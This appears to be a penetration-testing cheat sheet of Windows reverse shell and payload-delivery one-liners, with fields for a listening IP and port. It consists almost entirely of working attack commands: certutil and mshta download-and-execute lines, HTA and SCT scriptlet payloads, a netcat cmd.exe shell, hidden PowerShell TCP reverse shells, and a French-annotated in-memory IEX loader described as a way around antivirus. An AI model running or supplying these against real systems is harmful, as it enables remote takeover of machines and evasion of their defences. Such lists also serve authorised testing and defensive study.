Windows Reverse Shells Cheatsheet
Table of contents :
Listening IP | |
Listening Port |
Certutil
certutil.exe -urlcache -split -f http://<placeholder_ip>:<placeholder_port>/beacon.exe C:\Windows\Temp\beacon.exe & C:\Windows\Temp\beacon.exe
MSHTA
mshta.exe vbscript:Close(Execute("GetObject(""script:http://<placeholder_ip>:<placeholder_port>/payload.sct"")"))
mshta.exe http://<placeholder_ip>:<placeholder_port>/payload.hta
mshta.exe \\<placeholder_ip>\folder\payload.hta
SCT payloads
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
new ActiveXObject('WScript.Shell').Run("cmd.exe /c calc.exe");
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>
SCT payloads
<?XML version="1.0"?>
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[var r = new ActiveXObject("WScript.Shell").Run("calc.exe");]]>
</script>
</scriptlet>
Netcat
nc.exe -e cmd.exe <placeholder_ip> <placeholder_port>
Powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<placeholder_ip>",<placeholder_port>);$s=$client.GetStream();[byte[]]$b=0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2=$sb+"PS "+(pwd).Path+"> ";$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<placeholder_ip>',<placeholder_port>);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"
Téléchargez et exécutez une payload powershell directement en mémoire (cela peut être utile pour contourner les antivirus) :
powershell IEX (New-Object Net.WebClient).DownloadString('http://<placeholder_ip>:<placeholder_port>/shell.ps1')